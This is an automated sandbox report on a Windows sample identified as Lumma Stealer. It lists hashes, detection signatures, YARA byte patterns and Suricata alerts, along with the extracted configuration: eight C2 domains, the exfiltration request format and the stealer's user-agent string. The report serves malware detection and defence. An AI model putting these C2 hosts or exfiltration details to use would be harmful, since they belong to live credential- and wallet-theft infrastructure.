Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HK8IIasL9i.exe

Overview

General Information

Sample name:HK8IIasL9i.exe
renamed because original name is a hash value
Original sample name:7dc18a69dcdca002579bfde5d5427ff2.exe
Analysis ID:1579755
MD5:7dc18a69dcdca002579bfde5d5427ff2
SHA1:3b305cb3e20e48cb0b0532185e49136511838987
SHA256:dbcd285bed7578f894354dd630c4be5cf9ffdf4d4e96b861937235466bc8fc29
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • HK8IIasL9i.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\HK8IIasL9i.exe" MD5: 7DC18A69DCDCA002579BFDE5D5427FF2)
    • WerFault.exe (PID: 4024 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["crosshuaht.lat", "sustainskelet.lat", "discokeyus.lat", "energyaffai.lat", "rapeflowwj.lat", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:19.493066+010020283713Unknown Traffic192.168.2.54970423.55.153.106443TCP
      2024-12-23T08:38:22.062968+010020283713Unknown Traffic192.168.2.549705104.21.66.86443TCP
      2024-12-23T08:38:23.761720+010020283713Unknown Traffic192.168.2.549706104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:22.798773+010020546531A Network Trojan was detected192.168.2.549705104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:22.798773+010020498361A Network Trojan was detected192.168.2.549705104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:17.278115+010020583541Domain Observed Used for C2 Detected192.168.2.5555091.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:15.793341+010020583581Domain Observed Used for C2 Detected192.168.2.5498541.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:16.241365+010020583601Domain Observed Used for C2 Detected192.168.2.5593341.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:16.889637+010020583621Domain Observed Used for C2 Detected192.168.2.5541901.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:16.020160+010020583641Domain Observed Used for C2 Detected192.168.2.5627271.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:16.468783+010020583701Domain Observed Used for C2 Detected192.168.2.5540521.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:17.728617+010020583741Domain Observed Used for C2 Detected192.168.2.5501561.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:17.503964+010020583761Domain Observed Used for C2 Detected192.168.2.5557841.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:38:20.398145+010028586661Domain Observed Used for C2 Detected192.168.2.54970423.55.153.106443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: HK8IIasL9i.exeAvira: detected
      Source: 0.3.HK8IIasL9i.exe.2150000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "sustainskelet.lat", "discokeyus.lat", "energyaffai.lat", "rapeflowwj.lat", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat"], "Build id": "4h5VfH--"}
      Source: HK8IIasL9i.exeReversingLabs: Detection: 55%
      Source: HK8IIasL9i.exeVirustotal: Detection: 40%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: HK8IIasL9i.exeJoe Sandbox ML: detected
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapeflowwj.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: sustainskelet.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: aspecteirs.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: energyaffai.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacebudi.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: discokeyus.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: grannyejh.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4h5VfH--

      Compliance

      barindex
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeUnpacked PE file: 0.2.HK8IIasL9i.exe.400000.0.unpack
      Source: HK8IIasL9i.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]0_2_0043C767
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]0_2_0040B70C
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then jmp eax0_2_0042984F
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]0_2_00423860
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov edx, ecx0_2_00438810
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh0_2_00438810
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh0_2_00438810
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then test eax, eax0_2_00438810
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041682D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]0_2_0041682D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]0_2_0041682D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0041D83A
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then push C0BFD6CCh0_2_00423086
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then push C0BFD6CCh0_2_00423086
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042B170
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_004179C1
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h0_2_0043B1D0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, eax0_2_0043B1D0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_004291DD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_004291DD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, eax0_2_00405990
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebp, eax0_2_00405990
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, esi0_2_00422190
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00422190
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_00422190
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CA49
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0042DA53
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]0_2_00416263
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]0_2_00415220
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then push esi0_2_00427AD3
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CAD0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0041B2E0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then push ebx0_2_0043CA93
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041CB40
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0041CB40
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00428B61
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CB11
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CB22
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_0043F330
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, eax0_2_0040DBD9
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, eax0_2_0040DBD9
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00417380
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_0041D380
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp al, 2Eh0_2_00426B95
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00435450
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00417380
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then push 00000000h0_2_00429C2B
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_004291DD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_004291DD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_004074F0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_004074F0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0043ECA0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h0_2_004385E0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then jmp eax0_2_004385E0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]0_2_00417DEE
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, eax0_2_00409580
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_00409580
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then jmp dword ptr [0044450Ch]0_2_00418591
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]0_2_00428D93
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then xor edi, edi0_2_0041759F
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]0_2_0041C653
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov edx, ebp0_2_00425E70
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then jmp dword ptr [004455F4h]0_2_00425E30
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, eax0_2_0043AEC0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al0_2_00408F50
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00408F50
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0042A700
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0041BF14
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_00419F30
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]0_2_0041E7C0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_004197C2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [edi], dx0_2_004197C2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [esi], cx0_2_004197C2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, ebx0_2_0042DFE9
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then jmp ecx0_2_0040BFFD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov esi, eax0_2_00415799
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, eax0_2_00415799
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0043EFB0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]0_2_00748055
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]0_2_00754031
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov edx, ebp0_2_007560D7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0074C17B
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, eax0_2_0076B127
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al0_2_007391B7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_007391B7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_0074A197
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then jmp ecx0_2_0073C264
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, ebx0_2_0075E250
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0074D230
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0074D230
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0076F217
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then push C0BFD6CCh0_2_007532ED
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, esi0_2_007523F7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_007523F7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_007523F7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0075B3D7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_00759444
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_00759444
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then jmp dword ptr [004455F4h]0_2_007564DA
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]0_2_007464CA
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]0_2_00745487
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0074B547
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_007475E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_0074D5E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_0076F597
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_007656B7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00737757
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00737757
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, eax0_2_007397E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_007397E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h0_2_0076887B
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]0_2_0074C8BA
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]0_2_0073B973
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0075A967
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]0_2_0076C9CE
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then jmp eax0_2_0076898E
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov edx, ecx0_2_00768A77
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh0_2_00768A77
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh0_2_00768A77
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then test eax, eax0_2_00768A77
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]0_2_0074EA27
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_00749A29
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [edi], dx0_2_00749A29
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [esi], cx0_2_00749A29
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]0_2_00744ACD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then jmp eax0_2_00759AB5
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0074DAB8
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00746B2A
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, eax0_2_00735BF7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebp, eax0_2_00735BF7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]0_2_00744BD2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov esi, eax0_2_00745C41
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_00747C28
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then xor edi, edi0_2_00747C28
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then push ebx0_2_0076CCFA
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0075CCB0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0075DCBC
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0075CD78
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0075CD37
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then push esi0_2_00757D1A
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00758DC8
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0075CD89
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, eax0_2_0073DE40
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ebx, eax0_2_0073DE40
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh0_2_00744E96
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp al, 2Eh0_2_00756E96
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh0_2_00744E87
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then push 00000000h0_2_00759F40
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]0_2_00746F35
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]0_2_00746F35
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0076EF07
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov ecx, eax0_2_00745FD3
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]0_2_00758FA0

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.5:54052 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.5:50156 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.5:54190 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.5:49854 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:59334 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.5:55509 -> 1.1.1.1:53
